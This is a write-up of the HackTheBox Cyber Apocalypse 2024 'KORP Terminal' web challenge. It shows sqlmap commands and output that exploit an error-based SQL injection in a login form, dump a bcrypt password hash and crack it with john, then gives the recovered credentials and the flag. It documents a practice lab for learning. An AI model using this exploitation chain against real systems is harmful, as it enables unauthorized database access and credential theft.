KORP Terminal
Writeup for KORP Terminal (Web) - HackTheBox Cyber Apocalypse CTF (2024) 💜
Video Walkthrough
Description
Your faction must infiltrate the KORPâ„¢ terminal and gain access to the Legionaries' privileged information and find out more about the organizers of the Fray. The terminal login screen is protected by state-of-the-art encryption and security protocols.
Solution
Greeted by a login page. If we send single quotes in username/password box it triggers a MySQL error 👀
Tried SQLMap but it fails due to 401: Unauthorized.
Luckily, we can just ignore that HTTP code.
sqlmap -r new.req --batch --ignore-code 401
[INFO] POST parameter 'username' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectableFind the databases.
sqlmap -r new.req --batch --ignore-code 401 --dbs
available databases [3]:
[*] information_schema
[*] korp_terminal
[*] testThen the tables.
sqlmap -r new.req --batch --ignore-code 401 -D korp_terminal --tables
+-------+
| users |
+-------+Dump the passwords.
sqlmap -r new.req --batch --ignore-code 401 -D korp_terminal -T users -C password --dump
+--------------------------------------------------------------+
| password |
+--------------------------------------------------------------+
| $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. |
+--------------------------------------------------------------+Crack the bcrypt hash with john.
john hash --wordlist=$rockyou
password123Log in to the app and receive the flag.
admin:password123Flag: HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}
Last updated